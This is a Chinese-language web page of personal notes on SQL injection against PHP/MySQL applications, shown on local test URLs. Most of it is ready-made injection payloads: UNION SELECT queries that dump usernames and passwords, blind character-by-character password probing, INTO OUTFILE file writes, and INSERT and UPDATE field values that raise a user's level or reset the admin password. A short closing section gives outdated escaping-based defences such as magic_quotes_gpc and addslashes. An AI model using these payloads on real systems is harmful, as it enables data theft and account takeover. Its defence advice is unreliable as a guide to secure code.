PHP的SQL注入实现(测试代码安全不错) |
|
本文标签:PHP,SQL注入 SQL注入的重点就是构造SQL语句,只有灵活的运用SQL 语句才能构造出牛比的注入字符串 。学完之后写了点笔记,已备随时使用 。希望你在看下面内容时先了 解SQL的基本原理 。笔记中的代码来自网络 。 ===基础部分=== 本表查询: http://127.0.0.1/injection/user.php?username=angel and LENGTH(password)=6 http://127.0.0.1/injection/user.php?username=angel and LEFT(password,1)=m Union联合语句: http://127.0.0.1/injection/show.php?id=1 union select 1,username,password from user/* http://127.0.0.1/injection/show.php?id= union select 1,username,password from user/* 导出文件: http://127.0.0.1/injection/user.php?username=angel into outfile c:/file.txt http://127.0.0.1/injection/user.php?username= or 1=1 into outfile c:/file.txt http://127.0.0.1/injection/show.php?id= union select 1,username,password from user into outfile c:/user.txt INSERT语句: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES (, $username, $password, $homepage, 1); 构造homepage值为:http://4ngel.net, 3)# SQL语句变为:INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES (, angel, mypass, http://4ngel.net, 3)#, 1); UPDATE语句:我喜欢这样个东西 先理解这句SQL UPDATE user SET password=MD5($password), homepage=$homepage WHERE id=$id 如果此SQL被修改成以下形式,就实现了注入 1:修改homepage值为 http://4ngel.net, userlevel=3 之后SQL语句变为 UPDATE user SET password=mypass, homepage=http://4ngel.net, userlevel=3 WHERE id=$id userlevel为用户级别 2:修改password值为 mypass) WHERE username=admin# 之后SQL语句变为 UPDATE user SET password=MD5(mypass) WHERE username=admin#), homepage=$homepage WHERE id=$id 3:修改id值为 OR username=admin 之后SQL语句变为 UPDATE user SET password=MD5($password), homepage=$homepage WHERE id= OR username=admin ===高级部分=== 常用的MySQL内置函数 DATABASE() USER() SYSTEM_USER() SESSION_USER() CURRENT_USER() database() version() SUBSTRING() MID() char() load_file() …… 函数应用 UPDATE article SET title=DATABASE() WHERE id=1 http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version() SELECT * FROM user WHERE username=char(97,110,103,101,108) # char(97,110,103,101,108) 相当于angel,十进制 http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100) http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111 确定数据结构的字段个数及类型 http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97) 猜数据表名 http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members 跨表查询得到用户名和密码 http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 其他 #验证第一位密码 http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 ===注入防范=== 服务器方面 magic_quotes_gpc设置为On display_errors设置为Off 编码方面 $keywords = addslashes($keywords); $keywords = str_replace("_","\_",$keywords); $keywords = str_replace("%","\%",$keywords); 数值类型 使用intval()抓换 字符串类型 SQL语句参数中要添加单引号 下面代码,用于防治注入 if (get_magic_quotes_gpc()) { //.... }else{ $str = mysql_real_escape_string($str); $keywords = str_replace("_","\_",$keywords); $keywords = str_replace("%","\%",$keywords); } 有用的函数 stripslashes() get_magic_quotes_gpc() mysql_real_escape_string() strip_tags() array_map() addslashes() 参考文章: http://www.4ngel.net/article/36.htm (SQL Injection with MySQL)中文 http://www.phpe.net/mysql_manual/06-4.html(MYSQL语句参考) |
